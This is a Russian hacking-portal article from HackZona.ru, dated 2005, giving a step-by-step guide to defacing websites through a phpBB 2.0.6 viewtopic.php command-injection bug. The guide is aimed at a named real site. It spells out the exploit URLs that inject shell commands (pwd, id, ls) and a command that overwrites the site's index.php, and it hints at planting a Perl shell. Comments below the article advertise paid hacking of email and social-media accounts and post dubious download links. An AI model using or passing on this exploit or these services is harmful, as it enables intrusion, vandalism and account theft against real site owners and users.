Полное руководство по дефейсу (updated) - именно сервере обнаружена форуму права httpwwwmaxmuscledkoscluxmodulesphpopmodloadnamephpbb2filеviewtopicphpt2highlight%2527$poster%60$ls%60%2527l командой обнаруживаем phpbb системе сервер страницы

Поиск по Порталу

Меню

Территория Взлома

Новостная Лента

Ваша Безопасность

Взлом и Хакер

Forum.HackZona.Ru

Underground HZ

Программирование

Мануал в Помощь

Законодательство

Каталог Программ

Принять Участие

Поиск Кряков

Новичкам полезное

взлом забытых паролей
хакер высокого уровня
угон и защита уинов
cross domain scripting
конституция хакера
как делают дефейс
эксплоит: как и что
защита от вирусов
основы хакерства
основы хакинга
взлом чайников
защита от взлома
как стать хакером
скрытые процессы
взлом через telnet
в сетях спецслужб
защита от шпионов
обход и взлом firewall
взлом почтовых ящиков
новичкам об xss-взломах

Счетчики и Каталоги

сенсей учит

Серия "Основы хака"
Основы хакерства. Урок 1
Основы хакерства. Урок 2
Основы хакерства. Урок 3
Основы хакерства. Урок 4
Основы хакерства. Урок 5

Нестандартные лазейки SQL

Серия "Взлом окон"
Взлом Windows. Способ 1
Взлом Windows. Способ 2

взлом паролей хакер безопасность защита информации кряк взлом программ

Полное руководство по дефейсу (updated)
[ Хакерство для новичков ]

Введение
Я часто вижу вопрос на форуме: "Как ломать сайты?" или "Как задефэйсить сайт?". Сегодня вы сможете дефэйснуть портал, не приложив ни капли усилий! Всех любителей легкой добычи приглашаю! =)

Основная часть
Сегодня я расскажу о том, как делаются дефэйсы различных сайтов, через ошибки в популярных скриптах. Недавно была обнаружена серьезная дыра в безопасности популярного движка phpBB. Уязвимость была обнаружена в модуле viewtopic.php

Дело в том, что удаленный атакующий мог выполнить произвольный php-сценарий на уязвимой системе при передаче примерно такой строки viewtopic.php?t=1&highlight=%2527

Как вы уже, наверное, догадались, эта уязвимость позволяет выполнять произвольные команды любой длинны на уязвимом сервере. Сегодня мы воспользуемся этой дыркой, и вместе с вами сломаем реально существующий сервер. Целью нашей будет являться именно дефейс, то есть замена главной страницы сайта на нашу.

Итак, приступим, нашей жертвой станет www.maxmuscle.dk (на момент публикации статьи портал устойчив к уязвимости). Первое что бросается нам в глаза, при посещении этой страницы, так это то, что он построен на основе портальной системы php-nuke.

По умолчанию в этой системе форумом является именно phpBB. Мы щелкаем по линку который ведет нас к форуму, (http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=index.php) и убеждаемся в том, что это именно phpBB версии 2.0.6. Мы передаем форуму запрос такого вида

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%2527.$poster=%60$ls%60.%2527&l s=

и обнаруживаем что движок поглотил строчку о чем свидетельствует характерная надпись вместо ника одного из пользователей: ")#i". Но это ещё ничего не значит, у нас с легкостью может обломиться выполнение команд на этом сервере, но мы не будем гадать и просто попробуем выполнить ее:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%2527.$poster=%60$ls%60.%2527&l s=pwd

Эта команда (pwd) должна показать нам директорию, в которой мы сейчас находимся, если это произойдет, то из этого следует вывод что выполнение команд на сервере возможно. Так и происходит. Путь директории /var/www/html/osclux/ выведен на экран. Следующей командой следует «id» для проверки нашего доступа.

Как мы видим права у нас uid=99 (nobody), то есть права вэб сервера. Теперь мы выводим листинг папок и файлов в директории html_public, командой "dir /var/www/html/osclux" и обнаруживаем что так необходимый нам для дефэйса index.php лежит в этой директории.

Итак, мы на финишной прямой - выполнив команду echo Hacked by vasya > index.php, мы вывдем на главную страницу надпись «Hacked by vasya». Проверяем. Получилось. Вы сделали дефейс.

Вместо заключения
Именно таким вот нехитрым образом был проведен дефэйс hackzona.ru, именно так был сломан форум на nsd.ru. Замечу так же что это самая простая реализация этой дырки, при хороших условиях можно с легкостью заливить на сервер, слушающий определенный порт, скрипт на перле и получить уже полноценный шелл с nobody правами, а то что делать дальше - я расскажу в следующий раз = )

Послеслвие
Всё что описано в этой статье не более чем бред больного наркомана. Не стоит принимать полученную информацию близко к сердцу, а так же не рекомендуется применять поученные знания на практике. Так как вы можете нарушить УК РФ... а это не хорошо! При размещении этой статьи на других информационных ресурсах необходимо указывать мое авторство (Shar88) и ссылку на hackzona.ru

Shar88 эксклюзивно для HackZona.ru

Разместил: HackZona. Проверил: Xelarev. Опубликовано: 10.01.2005.
Средняя оценка: 3.10. Голосов: 265. Рейтинг статьи -


Супер!	Отлично	Хорошо	Нормально	Плохо


Напечатать текущую статью \| Рекомендация Статьи Другу

Последние 15 Комментариев к Статье

Новичок скачай Delphi и взламывай аккаунты ВКОНТАКТЕ, ОДНОКЛАССНИКИ и любое МЫЛО!!! + обучающие видео - смотри как на самом деле взламывают и учись;)
http://hackzone.at.ua/ - тут скачиваем и можете отблагодарить меня нажав на рекламу (чего Вам стоит, а мне приятно)!!! Спасибо заранее)))

ВНИМАНИЕ!!! новички не верьте тем кто предлагает взлом на заказ в комментариях это просто лохи, кидалы и неудачники! Если вам действительно нужно что-то взломать ищите исполнителей на форуме forum.hackzona.ru и работайте только через ГАРАНТ hackzona.ru

Если вы просто интересуйтесь, либо изучайте тогда на сайте hackzone.at.ua вы можете скачать видео и посмотреть как действительно происходят взломы. Плюс усвойте очень хороший урок ;) Рекомендую всем)))

Спасибо за внимание=)

Добавил: FixerCoolHacker. Добавлено: 02.09.2010.

Добавил: FixerCoolHacker. Добавлено: 27.08.2010.

Доброго всем времени суток... я Евгений Попов.

Я предлагаю свои услуги по взлому эл. почты и аккаунтов в соц. сетях.

- yandex.ru... цена 1400 р...
- mail.ru (включая все поддомены)... цена 1500 р...
- rambler.ru (включая все поддомены)... цена 1700 р...
- gmail.com... цена 1800 р...
- hotmail.com... цена 2400 р...

Я занимаюсь взломом только тех почтовых серверов, которые указаны выше... цена не изменяется (торг не уместен)... после взлома пароль не меняется (остается прежним)... работаю без предоплаты (оплата только после взлома и предоставления доказательств)... срок исполнения работы от 2-х часов, до 3-х суток (зависит от моей занятости)... оплату после взлома принимаю картами Яндекс Денег или картами WebMoney (они продаются в любом отделе Евросети), другие способы оплаты не рассматриваю.

По поводу взлома аккаунтов в соц.сетях:

На данный момент взламываю только странички на odnoklassniki.ru... стоимость данной работы 1900 р... логин и пароль так же остаются прежние... оплата после доказательств.

Ваши заказы принимаю на email# parolei.net@gmail.com

P.S. будьте внимательны, заказы принимаю только на этот email и никаких других средств связи не использую, по этому, если где то в сети увидите пост от моего имени с указанием номера icq или еще какого либо средства связи, то знайте - это МОШЕЙНИК...

Добавил: GeniiPopov. Добавлено: 24.08.2010.

Класс статейка
Delphi можно скачать тута: http://pecypz.ifolder.ru/18984802
РЕБЯТА не верьте лохам которые предлагают взлом в комментариях это ПРОСТО ЛОХИ!!

Добавил: t_h_n. Добавлено: 22.08.2010.

Качественный Взлом почты, Без предоплат"

- принимаю заказы на взлом Mail.Ru

- Работаю без предоплаты;

- Пароль при взломе Не меняется;

- Гарантирую Вам полную конфиденциальность и анонимность;

- Предоставляю любые Доказательcтва;

- Примерные сроки работы: 1 - 3 дня;

- Стоимость услуги 1500 р.

- Деньги перечисляете после получения Доказательств.

icq: 8966361

Добавил: 963852. Добавлено: 07.08.2010.

	Добавить Свой Комментарий
	Добавлять комментарии могут только Участники Портала!

Вход

Участник:
Пароль:

Online Монитор

Сейчас на Портале: 105
своих:0 и гостей:105

Сервис Whois

IP:

Офисные кресла, мебель офисная аргумент классика
Пластиковая Молниезащита от Беттерман
автостоянки вокзал